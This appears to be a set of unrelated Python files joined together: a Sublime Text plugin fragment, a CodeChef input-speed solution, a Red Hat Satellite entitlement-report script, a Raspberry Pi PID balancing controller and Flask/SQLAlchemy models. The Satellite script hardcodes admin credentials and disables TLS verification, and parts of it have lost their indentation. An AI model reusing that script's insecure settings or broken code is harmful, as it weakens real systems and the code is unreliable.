        sublime.status_message(u'немного подождите')
        # Download on a background thread to keep the UI responsive.
        t = threading.Thread(args=(dest_folder, self.archive_url, ), target=self._download_font_archive_and_unpack)
        t.start()
    def _font_archive_selected(self, index):
        if index < 0: return
        self.archive_url = self.font_data[index]['pack_url']
        self.folder_browser.select_folder()
    def _show_quick_panel(self, options, done):
        # ST3 requires deferring the quick panel with set_timeout.
        if is_st3():
            sublime.set_timeout(lambda: self.window.show_quick_panel(options, done), 10)
        else:
            self.window.show_quick_panel(options, done)
    def _selected(self, index):
        """Dispatch the main menu: 0=open site, 1=refresh, 2=download,
        >=3 insert the (index-3)-th font's import snippet."""
        if index < 0: return
        if index == 0:
            try:
                webbrowser.open(self.SITE_URL)
            except:
                sublime.status_message(u'не удалось открыть страницу "%s"' % self.SITE_URL)
        elif index == 1:
            old_font_data = self.font_data
            self.font_data = self._download_font_info()
            if self.font_data is None:
                # Keep the previous catalogue if the refresh failed.
                self.font_data = old_font_data
            self.run()
        elif index == 2:
            name_list = []
            if self.font_data is not None:
                for i in self.font_data:
                    name_list.append(i['name'])
            self._show_quick_panel(name_list, self._font_archive_selected)
        else:
            text = self.font_data[index-3]['import'] + '\n' + self.font_data[index-3]['comments']
            self._insert(text)
# Question:-
# The purpose of this problem is to verify whether the method you are using to read input data is sufficiently fast to handle problems
# branded with the enormous Input/Output warning. You are expected to be able to process at least 2.5MB of input data per second at runtime.
# Input:-
# The input begins with two positive integers n k (n, k<=107). The next n lines of
# input contain one positive integer ti, not greater than 109, each.
# Output:-
# Write a single integer to output, denoting how many integers ti are divisible by k.
# Example:-
# Input:
# 7 3
# 1
# 51
# 966369
# 7
# 9
# 999996
# 11
# Output:
# 4
# Code:-
import sys

# Read all of stdin at once: for the "enormous input" constraint of this
# problem, one bulk read is far faster than one input() call per line.
# (Also avoids shadowing the builtin `str`, which the old code did.)
tokens = sys.stdin.read().split()
n = int(tokens[0])
k = int(tokens[1])
# Count how many of the n values are divisible by k.
ans = sum(1 for t in tokens[2:2 + n] if int(t) % k == 0)
print(ans)
#This is the code for Enourmus Input Test. This is the second problem in Beginner's Section.
#Thank you for reading my code!!!
#if you like:
# give a star
#else:
# give a star
|
#!/usr/bin/python
"""
Date .......: 01/06/2019
Developer ..: Waldirio M Pinheiro (waldirio@redhat.com / waldirio@gmail.com)
Purpose ....: Collect information from Satellite Server and show hypervisor versus Content Host
- Subscription information
"""
import sys
import datetime
import urllib3
try:
import requests
except ImportError:
print "Please install the python-requests module."
sys.exit(-1)
# URL to your Satellite 6 server
URL = "https://sat631.local.domain"
# Default credentials to login to Satellite 6
# NOTE(review): credentials are hardcoded in source -- consider moving
# them to a config file or environment variables.
USERNAME = "admin"
PASSWORD = "redhat"
# URL for the API to your deployed Satellite 6 server
SAT_API = "%s/api/v2/" % URL
# Ignore SSL for now
SSL_VERIFY = False
# Entries Number on Report *object per page*
NUM_ENTRIES_ON_REPORT = "50000"
# Module-level state shared by generate_report/check_content_host:
# hyper_list: virt-who hypervisor records; final_list: output CSV rows.
hyper_list = []
final_list = []
hyper_detail = []
hypervisor_name = ""
subscription_name = ""
# Silence the InsecureRequestWarning caused by SSL_VERIFY = False.
urllib3.disable_warnings()
def get_json(location):
    """
    Perform an authenticated GET against *location* and return the
    parsed JSON response body.
    """
    response = requests.get(location, auth=(USERNAME, PASSWORD), verify=SSL_VERIFY)
    return response.json()
def save_on_disk():
print "## Phase 3: {}".format(datetime.datetime.now())
FILE = "/tmp/ch_entitlement.csv"
print "Saving on file: {}".format(FILE)
fp = open(FILE, "w+")
fp.write("hypervisor_name,hypervisor_entitlement,content_host_name,content_host_entitlement\n")
for item in final_list:
fp.write("{},{},{},{}\n".format(item[0], item[1], item[2], item[3]))
fp.close()
def check_content_host():
    """Append one CSV row per virtual guest of the current hypervisor.

    Reads the module-level hyper_detail / hypervisor_name /
    subscription_name set by generate_report() and appends
    (hypervisor, subscription, guest, guest-subscription) tuples to
    the module-level final_list.
    """
    global hyper_detail
    global hypervisor_name
    global subscription_name
    try:
        num_vguests = len(hyper_detail['subscription_facet_attributes']['virtual_guests'])
    except KeyError:
        # Record has no virtual_guests key at all -- treat as guest-less.
        print "KeyError: Hypervisor to check: {}".format(hyper_detail['name'])
        num_vguests = 0
    if (num_vguests == 0):
        # No guests: emit one row with empty content-host columns.
        content_host_name = None
        ch_entitlement = None
        # print "{},{},{},{}".format(hypervisor_name,subscription_name,content_host_name,ch_entitlement)
        aux = hypervisor_name, subscription_name, content_host_name, ch_entitlement
        final_list.append(aux)
    else:
        for content_host in hyper_detail['subscription_facet_attributes']['virtual_guests']:
            content_host_id = content_host['id']
            content_host_name = content_host['name']
            # One extra API round-trip per guest to fetch its subscriptions.
            content_host_info = get_json(SAT_API + "hosts/" + str(content_host_id) + "/subscriptions")
            check_results = 0
            try:
                check_results = len(content_host_info['results'])
            except KeyError:
                # Sentinel: the API reply had no 'results' key.
                check_results = -999
            if (check_results == -999):
                ch_entitlement = "Check This Machine"
            else:
                if (len(content_host_info['results']) == 0):
                    # Guest has no subscriptions attached.
                    ch_entitlement = None
                    # print "{},{},{},{}".format(hypervisor_name,subscription_name,content_host_name,ch_entitlement)
                    aux = hypervisor_name, subscription_name, content_host_name, ch_entitlement
                    final_list.append(aux)
                else:
                    # One row per attached subscription; commas stripped so
                    # the product name stays a single CSV field.
                    for ch_entitlement in content_host_info['results']:
                        # print "{},{},{},{}".format(hypervisor_name,subscription_name,content_host_name,ch_entitlement['product_name'].replace(",",""))
                        try:
                            product_name_temp = ch_entitlement['product_name'].replace(",", "")
                        except KeyError:
                            product_name_temp = "No_Product_Name_Key"
                        # aux = hypervisor_name, subscription_name, content_host_name, ch_entitlement['product_name'].replace(",", "")
                        aux = hypervisor_name, subscription_name, content_host_name, product_name_temp
                        final_list.append(aux)
def generate_report():
global hyper_detail
global hypervisor_name
global subscription_name
print "## Phase 2: {}".format(datetime.datetime.now())
for hyper in hyper_list:
hyper_info = get_json(SAT_API + "hosts/" + str(hyper['id']) + "/subscriptions")
hyper_detail = get_json(SAT_API + "hosts/" + str(hyper['id']))
# Hypervisor Name
hypervisor_name = hyper['name']
# Hypervisor Entitlement
try:
check_results = len(hyper_info['results'])
except IndexError:
subscription_name = None
except KeyError:
subscription_name = None
if (check_results == 0):
subscription_name = None
check_content_host()
else:
for ent in hyper_info['results']:
subscription_name = ent['name'].replace(",", "")
check_content_host()
def main():
    """Entry point: collect virt-who hypervisors, build the report, save CSV."""
    print """
    Script in 3 Phases
    1. Collect the whole Content Host info from Satellite and filter only virt-who-*
    2. Process all Hypervisors (virt-who-*) and Content Hosts running on the TOP of each one
    3. Generate a huge CSV file with the entitlement information
    """
    # per_page=0 returns only counters; 'subtotal' is the match count.
    count_hosts = get_json(SAT_API + "hosts" + "?per_page=0&search=name~virt-who-*")['subtotal']
    print "## Phase 1 ({} Hypervisors): {}".format(count_hosts, datetime.datetime.now())
    hosts = get_json(SAT_API + "hosts" + "?per_page=" + NUM_ENTRIES_ON_REPORT + "&search=name~virt-who-*")
    # Filtering all Hypervisors (virt-who-*) || Updated, the filter now is via search on the API query
    for host in hosts['results']:
        hyper_list.append(host)
    # Generating the Report
    generate_report()
    # Saving on disk
    save_on_disk()
    print "Ending: {}".format(datetime.datetime.now())
if __name__ == "__main__":
    main()
|
# PID tuning for the balance controller.
# setpoint: target angle in filtered-angle units -- TODO confirm units.
setpoint = 11
Kp=5
Ki=2
Kd=0.2
# Control loop period in seconds (busy-wait at the bottom of the loop).
DT = 0.02
#Best values
'''
10,5,0.22
'''
#Driver for the LSM303D accelerometer and L3GD20H magnetometer and compass
#First follow the procedure to enable I2C on R-Pi.
#1. Add the lines ic2-bcm2708 and i2c-dev to the file etcmodules
#2. Comment out the line blacklist ic2-bcm2708 (with a #) in the file etcmodprobe.draspi-blacklist.conf
#3. Install I2C utility (including smbus) with the command apt-get install python-smbus i2c-tools
#4. Connect the I2C device and detect it using the command i2cdetect -y 1. It should show up as 1D or 1E (here the variable LSM is set to 1D).
import time, math
import wiringpi2 as wiringpi
from smbus import SMBus
# I2C bus 1 is the user-accessible bus on modern Raspberry Pi boards.
busNum = 1
bus = SMBus(busNum)
class PID:
    """Minimal PID controller.

    All gains start at zero, so GenOut() returns 0 until SetKp/SetKi/SetKd
    are called.  Time deltas are measured with wall-clock time between
    successive GenOut() calls.
    """
    def __init__(self):
        # Gains default to zero -> controller output is zero until tuned.
        self.Kp = 0
        self.Kd = 0
        self.Ki = 0
        self.Initialize()
    def SetKp(self, invar):
        """Set the proportional gain."""
        self.Kp = invar
    def SetKi(self, invar):
        """Set the integral gain."""
        self.Ki = invar
    def SetKd(self, invar):
        """Set the derivative gain."""
        self.Kd = invar
    def SetPrevErr(self, preverr):
        """Seed the previous-error value used by the derivative term."""
        self.prev_err = preverr
    def Initialize(self):
        """Reset timestamps and accumulated P/I/D terms."""
        self.currtm = time.time()
        self.prevtm = self.currtm
        self.prev_err = 0
        self.Cp = 0
        self.Ci = 0
        self.Cd = 0
    def GenOut(self, error):
        """Run one PID step for *error* and return the control output."""
        self.currtm = time.time()
        elapsed = self.currtm - self.prevtm
        delta_err = error - self.prev_err
        self.Cp = self.Kp * error          # proportional contribution
        self.Ci += error * elapsed         # accumulate the integral
        # Derivative term; guard against a zero time step.
        self.Cd = (delta_err / elapsed) if elapsed > 0 else 0
        # Remember state for the next step.
        self.prevtm = self.currtm
        self.prev_err = error
        return self.Cp + (self.Ki * self.Ci) + (self.Kd * self.Cd)
def convert(msb, lsb):
    """Combine two register bytes into a signed 16-bit (two's-complement) value."""
    raw = (msb << 8) + lsb
    return raw - 65536 if raw >= 32768 else raw
def translate(value, PIDMin, PIDMax, PWMMin, PWMMax):
    """Linearly map *value* from the PID output range onto the PWM range."""
    pid_span = PIDMax - PIDMin
    pwm_span = PWMMax - PWMMin
    # Normalize to a 0-1 fraction of the PID range (float division).
    fraction = float(value - PIDMin) / float(pid_span)
    # Scale that fraction into the PWM range.
    return PWMMin + (fraction * pwm_span)
# Register map constants, taken from the LSM303D and L3GD20H datasheets.
# LSM303D Registers
LSM = 0x1d #I2C Address of the LSM303D
LSM_WHOAMI_ID = 0b1001001 #Device self-id
LSM_WHOAMI_ADDRESS = 0x0F
#Control register addresses -- from LSM303D datasheet
CTRL_0 = 0x1F #General settings
CTRL_1 = 0x20 #Turns on accelerometer and configures data rate
CTRL_2 = 0x21 #Self test accelerometer, anti-aliasing accel filter
CTRL_3 = 0x22 #Interrupts
CTRL_4 = 0x23 #Interrupts
CTRL_5 = 0x24 #Turns on temperature sensor
CTRL_6 = 0x25 #Magnetic resolution selection, data rate config
CTRL_7 = 0x26 #Turns on magnetometer and adjusts mode
#Registers holding twos-complemented MSB and LSB of magnetometer readings -- from LSM303D datasheet
MAG_X_LSB = 0x08 # x
MAG_X_MSB = 0x09
MAG_Y_LSB = 0x0A # y
MAG_Y_MSB = 0x0B
MAG_Z_LSB = 0x0C # z
MAG_Z_MSB = 0x0D
#Registers holding twos-complemented MSB and LSB of accelerometer readings -- from LSM303D datasheet
ACC_X_LSB = 0x28 # x
ACC_X_MSB = 0x29
ACC_Y_LSB = 0x2A # y
ACC_Y_MSB = 0x2B
ACC_Z_LSB = 0x2C # z
ACC_Z_MSB = 0x2D
#Registers holding 12-bit right justified, twos-complemented temperature data -- from LSM303D datasheet
TEMP_MSB = 0x05
TEMP_LSB = 0x06
## L3GD20H registers
LGD = 0x6b #Device I2C slave address
LGD_WHOAMI_ADDRESS = 0x0F
LGD_WHOAMI_ID = 0b11010111 #Device self-id
LGD_CTRL_1 = 0x20 #turns on gyro
LGD_CTRL_2 = 0x21 #can set a high-pass filter for gyro
LGD_CTRL_3 = 0x22
LGD_CTRL_4 = 0x23
LGD_CTRL_5 = 0x24
LGD_CTRL_6 = 0x25
LGD_TEMP = 0x26
#Registers holding gyroscope readings
LGD_GYRO_X_LSB = 0x28
LGD_GYRO_X_MSB = 0x29
LGD_GYRO_Y_LSB = 0x2A
LGD_GYRO_Y_MSB = 0x2B
LGD_GYRO_Z_LSB = 0x2C
LGD_GYRO_Z_MSB = 0x2D
# Probe the WHO_AM_I registers to confirm both sensors answer on the bus.
if bus.read_byte_data(LSM, LSM_WHOAMI_ADDRESS) == LSM_WHOAMI_ID:
    print 'LSM303D detected successfully.'
else:
    print 'No LSM303D detected on bus '+str(busNum)+'.'
if bus.read_byte_data(LGD, LGD_WHOAMI_ADDRESS) == LGD_WHOAMI_ID:
    print 'L3GD20H detected successfully.'
else:
    print 'No L3GD20H detected on bus on I2C bus '+str(busNum)+'.'
# Configure the accelerometer, magnetometer and gyro operating modes.
bus.write_byte_data(LSM, CTRL_1, 0b1100111) # enable accelerometer, 100 hz sampling
bus.write_byte_data(LSM, CTRL_2, 0b0000000) #set +- 2g full scale page 36 datasheet
bus.write_byte_data(LSM, CTRL_5, 0b01100100) #high resolution mode, thermometer off, 6.25hz ODR
bus.write_byte_data(LSM, CTRL_6, 0b00100000) # set +- 4 gauss full scale
bus.write_byte_data(LSM, CTRL_7, 0x00) #get magnetometer out of low power mode
bus.write_byte_data(LGD, LGD_CTRL_1, 0x0F) #turn on gyro and set to normal mode
bus.write_byte_data(LGD, LGD_CTRL_4, 0b00110000) #set 2000 dps full scale
# Motor-driver GPIO setup via WiringPi.
wiringpi.wiringPiSetup()
wiringpi.pinMode(1, 2) # sets WP pin 1 to PWM
wiringpi.pwmWrite(1, 0)# duty cycle between 0 and 1024. 0 = off, 1024 = fully on
wiringpi.pinMode(3, 1) # sets WP pin 3 to output
wiringpi.pinMode(4, 1) # sets WP pin 4 to output
wiringpi.pinMode(5, 1) # sets WP pin 5 to output
wiringpi.pinMode(6, 1) # sets WP pin 6 to output
PI = 3.14159265358979323846
RAD_TO_DEG = 57.29578
# Complementary-filter weight: gyro fraction vs. accelerometer fraction.
AA = 0.98
# Integrated gyro angles and complementary-filter state.
gyrox_angle = 0.0
gyroy_angle = 0.0
gyroz_angle = 0.0
CFangx = 0.0
CFangy = 0.0
# Controller instance, tuned with the module-level gains.
pid = PID()
pid.SetKp(Kp)
pid.SetKi(Ki)
pid.SetKd(Kd)
# Log file: first three lines are the gains, then angle,output per step.
fo = open("pid.csv","w")
fo.write( str(Kp) + "\n")
fo.write( str(Ki) + "\n")
fo.write( str(Kd) + "\n")
# Main control loop: read sensors, fuse angles, run PID, drive the motor.
while True:
    now = time.time() #use wall time instead of process time
    #magx = convert(bus.read_byte_data(LSM, MAG_X_MSB), bus.read_byte_data(LSM, MAG_X_LSB))
    #magy = convert(bus.read_byte_data(LSM, MAG_Y_MSB), bus.read_byte_data(LSM, MAG_Y_LSB))
    #magz = convert(bus.read_byte_data(LSM, MAG_Z_MSB), bus.read_byte_data(LSM, MAG_Z_LSB))
    #print "Magnetic field (x, y, z):", magx, magy, magz
    # Raw accelerometer counts -> g (0.061 mg/LSB at +-2g), plus
    # empirically measured per-axis offsets.
    accx = convert(bus.read_byte_data(LSM, ACC_X_MSB), bus.read_byte_data(LSM, ACC_X_LSB))
    accy = convert(bus.read_byte_data(LSM, ACC_Y_MSB), bus.read_byte_data(LSM, ACC_Y_LSB))
    accz = convert(bus.read_byte_data(LSM, ACC_Z_MSB), bus.read_byte_data(LSM, ACC_Z_LSB))
    accx = accx * 0.061 * 0.001 +0.06
    accy = accy * 0.061 * 0.001 -0.02
    accz = accz * 0.061 * 0.001 -0.08# the reading has offset, correction of 0.1 needed
    #print "Acceleration (x, y, z):", accx, accy, accz
    # Raw gyro counts -> deg/s (0.07 dps/LSB at 2000 dps full scale).
    gyrox = convert(bus.read_byte_data(LGD, LGD_GYRO_X_MSB), bus.read_byte_data(LGD, LGD_GYRO_X_LSB))
    gyroy = convert(bus.read_byte_data(LGD, LGD_GYRO_Y_MSB), bus.read_byte_data(LGD, LGD_GYRO_Y_LSB))
    gyroz = convert(bus.read_byte_data(LGD, LGD_GYRO_Z_MSB), bus.read_byte_data(LGD, LGD_GYRO_Z_LSB))
    rate_gyrox = gyrox * 0.07
    rate_gyroy = gyroy * 0.07
    rate_gyroz = gyroz * 0.07
    # Integrate angular rate over the nominal loop period.
    gyrox_angle+=rate_gyrox*DT
    gyroy_angle+=rate_gyroy*DT
    gyroz_angle+=rate_gyroz*DT
    #gyx = rate_gyrox*DT
    #gyy = rate_gyroy*DT
    #gyz = rate_gyroz*DT
    #print "Gyroscope (x, y, z):", gyx, gyy, gyz
    # Tilt angle from the accelerometer alone (degrees).
    accx_angle = (math.atan2(accy,accz))*RAD_TO_DEG
    #accy_angle = (math.atan2(-accx,accz))*RAD_TO_DEG
    """ The following code does not have problems with regions of instability but consumes a lot of processing power
    #accx_angle = (math.atan2(accy,math.sqrt(accx*accx+accz*accz))+PI)*RAD_TO_DEG
    #accy_angle = (math.atan2(accx,math.sqrt(accy*accy+accz*accz))+PI)*RAD_TO_DEG
    """
    #print "Accelerometer Angle = ", accx_angle
    # Complementary filter: trust the gyro short-term, accel long-term.
    CFangx = AA*(CFangx+rate_gyrox*DT) +(1 - AA) * accx_angle
    #CFangy = AA*(CFangy+rate_gyroy*DT) +(1 - AA) * accy_angle
    print "Filtered Angle = ", CFangx #, CFangy # accx_angle,accy_angle #
    error = setpoint - CFangx
    output = pid.GenOut(error)
    print "output = ", output
    # Sign of the PID output selects the motor direction pins.
    if (output < 0) : #CFangx or output??
        wiringpi.digitalWrite(3, 0) #In1 High
        wiringpi.digitalWrite(4, 1) #In2 Low
    #	wiringpi.digitalWrite(5, 1) #In3 Low
    #	wiringpi.digitalWrite(6, 0) #In4 High
    else :
        wiringpi.digitalWrite(3, 1) #In1 Low
        wiringpi.digitalWrite(4, 0) #in2 High
    #	wiringpi.digitalWrite(5, 0) #In3 High
    #	wiringpi.digitalWrite(6, 1) #In4 Low
    # Magnitude of the output drives the PWM duty cycle, clamped to 1024.
    if (output < 0) :
        posoutput = -output
    else :
        posoutput = output
    pwmout = translate(posoutput,0,50,900,1024)
    if (pwmout > 1024) :
        pwmout = 1024
    wiringpi.pwmWrite(1,int(pwmout))
    # Log one "angle,output" sample per iteration.
    fo.write(str(CFangx)+","+str(output)+"\n")
    #print "pwmout = ", pwmout
    '''
    if (output < 0)
        wiringpi.digitalWrite(3, 1) #enable pin A
        wiringpi.digitalWrite(1, 1) #In1 High
        wiringpi.digitalWrite(4, 0) #In2 Low
    else :
        wiringpi.digitalWrite(0, 1) #enable pin
        wiringpi.digitalWrite(1, 0) #In1 Low
        wiringpi.digitalWrite(4, 1) #in2 High
    '''
    #print "time = ", time.time()-now
    # Busy-wait until the fixed DT period has elapsed to pace the loop.
    while (time.time() <= now + DT):
        pass
|
import os
import datetime
import hashlib
from nova import app, db
from sqlalchemy_utils import PasswordType, force_auto_coercion
from itsdangerous import Signer, BadSignature
# Let sqlalchemy_utils coerce plain assignments into its column types
# (e.g. assigning a plain string to a PasswordType column hashes it).
force_auto_coercion()
class User(db.Model):
    """Account model: hashed password, signed API token, gravatar hash."""
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String, unique=True)
    email = db.Column(db.String)
    fullname = db.Column(db.String)
    is_admin = db.Column(db.Boolean, default=False)
    # PasswordType hashes transparently on assignment (pbkdf2_sha512).
    password = db.Column(PasswordType(
        schemes=['pbkdf2_sha512'],
        pbkdf2_sha512__default_rounds=50000,
        pbkdf2_sha512__salt_size=16),
        nullable=False)
    token = db.Column(db.String)
    token_time = db.Column(db.DateTime)
    gravatar = db.Column(db.String)
    first_time = db.Column(db.Boolean, default=True)
    def __init__(self, name=None, fullname=None, email=None, password=None, is_admin=False):
        self.name = name
        self.fullname = fullname
        self.email = email
        self.password = password
        self.is_admin = is_admin
        # NOTE(review): md5() needs bytes on Python 3, and email may be
        # None despite the keyword default -- confirm callers always pass
        # a str email (Python 2 semantics appear assumed here).
        self.gravatar = hashlib.md5(email.lower()).hexdigest()
    def __repr__(self):
        # NOTE(review): format string lacks a closing ')' -- cosmetic only.
        return '<User(name={}, fullname={}>'.format(self.name, self.fullname)
    def get_signer(self):
        # Signer keyed on password hash + token issue time, so changing
        # the password or reissuing a token invalidates old tokens.
        return Signer(self.password.hash + self.token_time.isoformat())
    def generate_token(self):
        """Issue a fresh signed token for this user and persist it."""
        self.token_time = datetime.datetime.utcnow()
        self.token = self.get_signer().sign(str(self.id))
        db.session.commit()
    def is_token_valid(self, token):
        """Return True iff *token* unsigns to this user's id."""
        try:
            if str(self.id) != self.get_signer().unsign(token):
                return False
        except BadSignature:
            return False
        return True
    # The four methods below match the Flask-Login user interface
    # (presumably -- no Flask-Login import is visible in this view).
    def is_authenticated(self):
        return True
    def is_active(self):
        return True
    def is_anonymous(self):
        return False
    def get_id(self):
        # The unique name serves as the session identifier.
        return self.name
    def to_dict(self):
        return dict(name=self.name, email=self.email, fullname = self.fullname)
class Collection(db.Model):
    """A named group of datasets."""
    __tablename__ = 'collections'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String)
    description = db.Column(db.String)
    # Datasets are deleted together with their collection.
    datasets = db.relationship('Dataset', cascade='all, delete, delete-orphan')
    def __repr__(self):
        return '<Collection(name={})>'.format(self.name)
class Group(db.Model):
    """A user group; members are linked through Membership rows."""
    __tablename__ = 'groups'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String)
    description = db.Column(db.String)
    # Memberships are deleted together with their group.
    memberships = db.relationship('Membership', cascade='all, delete, delete-orphan')
class Membership(db.Model):
    """Association of a user with a group, with creator/admin flags."""
    __tablename__ = 'memberships'
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    group_id = db.Column(db.Integer, db.ForeignKey('groups.id'))
    is_creator = db.Column(db.Boolean, default=False)
    is_admin = db.Column(db.Boolean, default=False)
    user = db.relationship('User')
    group = db.relationship('Group')
class Dataset(db.Model):
    """Polymorphic base for stored datasets.

    Subclasses (SampleScan, Volume) use joined-table inheritance
    discriminated by the 'type' column.
    """
    __tablename__ = 'datasets'
    id = db.Column(db.Integer, primary_key=True)
    type = db.Column(db.String(50))
    name = db.Column(db.String)
    description = db.Column(db.String)
    path = db.Column(db.String)
    created = db.Column(db.DateTime, default=datetime.datetime.utcnow)
    closed = db.Column(db.Boolean, default=False)
    collection_id = db.Column(db.Integer, db.ForeignKey('collections.id'))
    has_thumbnail = db.Column(db.Boolean, default=False)
    collection = db.relationship('Collection', back_populates='datasets')
    # Access rows are deleted together with the dataset.
    accesses = db.relationship('Access', cascade='all, delete, delete-orphan')
    permissions = db.relationship('Permission', uselist=False)
    __mapper_args__ = {
        'polymorphic_identity': 'dataset',
        'polymorphic_on': type
    }
    def to_dict(self):
        # Expose the path as absolute, rooted at the configured NOVA root.
        path = os.path.join(app.config['NOVA_ROOT_PATH'], self.path)
        return dict(name=self.name, path=path, closed=self.closed, description=self.description)
    def __repr__(self):
        return '<Dataset(name={}, path={}>'.format(self.name, self.path)
class Taxon(db.Model):
    """Taxonomic name referenced by SampleScan."""
    __tablename__ = 'taxons'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String)
    def __repr__(self):
        return '<Taxon(name={}>'.format(self.name)
class Order(db.Model):
    """Taxonomic order referenced by SampleScan."""
    __tablename__ = 'orders'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String)
    def __repr__(self):
        return '<Order(name={}>'.format(self.name)
class Family(db.Model):
    """Taxonomic family referenced by SampleScan."""
    __tablename__ = 'families'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String)
    def __repr__(self):
        return '<Family(name={}>'.format(self.name)
class Genus(db.Model):
    """Taxonomic genus referenced by SampleScan."""
    __tablename__ = 'genuses'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String)
    def __repr__(self):
        return '<Genus(name={}>'.format(self.name)
class SampleScan(Dataset):
    """Dataset subtype: a scan annotated with optional taxonomy links."""
    __tablename__ = 'samplescans'
    __mapper_args__ = {
        'polymorphic_identity': 'samplescan'
    }
    id = db.Column(db.Integer, db.ForeignKey('datasets.id'), primary_key=True)
    # All taxonomy references are optional.
    taxon_id = db.Column(db.Integer, db.ForeignKey('taxons.id'), nullable=True)
    genus_id = db.Column(db.Integer, db.ForeignKey('genuses.id'), nullable=True)
    family_id = db.Column(db.Integer, db.ForeignKey('families.id'), nullable=True)
    order_id = db.Column(db.Integer, db.ForeignKey('orders.id'), nullable=True)
    taxon = db.relationship('Taxon')
    genus = db.relationship('Genus')
    family = db.relationship('Family')
    order = db.relationship('Order')
class Volume(Dataset):
    """Dataset subtype: a volume with a slices descriptor string."""
    __tablename__ = 'volumes'
    __mapper_args__ = {
        'polymorphic_identity': 'volume'
    }
    id = db.Column(db.Integer, db.ForeignKey('datasets.id'), primary_key=True)
    slices = db.Column(db.String)
class Permission(db.Model):
    """Owner-level read/interact/fork permissions on a dataset."""
    __tablename__ = 'permissions'
    id = db.Column(db.Integer, primary_key=True)
    owner_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
    # Reading and interacting default to allowed; forking must be granted.
    can_read = db.Column(db.Boolean, default=True)
    can_interact = db.Column(db.Boolean, default=True)
    can_fork = db.Column(db.Boolean, default=False)
    owner = db.relationship('User')
    dataset = db.relationship('Dataset', back_populates='permissions')
    def __repr__(self):
        return '<Permission(dataset={}, owner = {}, read={}, interact={}, fork={}>'.\
            format(self.dataset, self.owner, self.can_read, self.can_interact, self.can_fork)
class Access(db.Model):
    """Per-user access record on a dataset (ownership/writability/seen)."""
    __tablename__ = 'accesses'
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
    owner = db.Column(db.Boolean)
    writable = db.Column(db.Boolean)
    seen = db.Column(db.Boolean, default=False)
    user = db.relationship('User')
    dataset = db.relationship('Dataset', back_populates='accesses')
    def __repr__(self):
        return '<Access(user={}, dataset={}, owner={}, writable={}>'.\
            format(self.user.name, self.dataset.name, self.owner, self.writable)
class Notification(db.Model):
    """A typed message addressed to a single user."""
    __tablename__ = 'notifications'
    id = db.Column(db.Integer, primary_key=True)
    message = db.Column(db.String)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    user = db.relationship('User')
    type = db.Column(db.String)
    def __init__(self, user, type='message', message=None):
        self.user = user
        self.type = type
        self.message = message
    def __repr__(self):
        return '<Notification(user={}, message={})>'.\
            format(self.user.name, self.message)
    def to_dict(self):
        return {'message': self.message, 'id': self.id, 'type': self.type}
class Process(db.Model):
    """Polymorphic base for a task turning a source dataset into a
    destination dataset; subclasses discriminate on 'type'."""
    __tablename__ = 'processes'
    id = db.Column(db.Integer, primary_key=True)
    type = db.Column(db.String(50))
    # Identifier of the asynchronous task executing this process.
    task_uuid = db.Column(db.String)
    source_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
    destination_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
    collection_id = db.Column(db.Integer, db.ForeignKey('collections.id'))
    # Two FKs into the same table require explicit foreign_keys here.
    source = db.relationship('Dataset', foreign_keys=[source_id])
    destination = db.relationship('Dataset', foreign_keys=[destination_id])
    collection = db.relationship('Collection')
    __mapper_args__ = {
        'polymorphic_identity': 'process',
        'polymorphic_on': type
    }
    def __repr__(self):
        return '<Process(src={}, dst={})>'.\
            format(self.source.name, self.destination.name)
class Reconstruction(Process):
    """Process subtype carrying tomographic reconstruction inputs/outputs."""
    __tablename__ = 'reconstructions'
    __mapper_args__ = {
        'polymorphic_identity': 'reconstruction'
    }
    id = db.Column(db.Integer, db.ForeignKey('processes.id'), primary_key=True)
    flats = db.Column(db.String())
    darks = db.Column(db.String())
    projections = db.Column(db.String())
    output = db.Column(db.String())
class Derivation(Process):
    """Process subtype marking a dataset derived from another; no extra fields."""
    __tablename__ = 'derivations'
    __mapper_args__ = {
        'polymorphic_identity': 'derivation'
    }
    id = db.Column(db.Integer, db.ForeignKey('processes.id'), primary_key=True)
class Bookmark(db.Model):
    """A user's bookmark on a dataset."""
    __tablename__ = 'bookmarks'
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
    user = db.relationship('User', foreign_keys=[user_id])
    dataset = db.relationship('Dataset', foreign_keys=[dataset_id])
    def __init__(self, user, dataset):
        self.user = user
        self.dataset = dataset
    def __repr__(self):
        return '<Bookmark(user={}, dataset={})>'.format(self.user, self.dataset)
    def to_dict(self):
        return dict(user=self.user.name, collection=self.dataset.collection.name, dataset=self.dataset.name)
class Review(db.Model):
    """A user's rating and comment on a dataset."""
    __tablename__ = 'reviews'
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
    rating = db.Column(db.Integer)
    comment = db.Column(db.String)
    created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
    user = db.relationship('User', foreign_keys=[user_id])
    dataset = db.relationship('Dataset', foreign_keys=[dataset_id])
    def __init__(self, user, dataset, rating, comment):
        self.user = user
        self.dataset = dataset
        self.rating = rating
        self.comment = comment
    def __repr__(self):
        return '<Review(user={}, dataset={}, rating={}, comment={})>'.\
            format(self.user, self.dataset, self.rating, self.comment)
class Connection(db.Model):
    """A directed user-to-user link carrying a degree counter."""

    __tablename__ = 'connections'

    id = db.Column(db.Integer, primary_key=True)
    from_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    to_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    degree = db.Column(db.Integer)
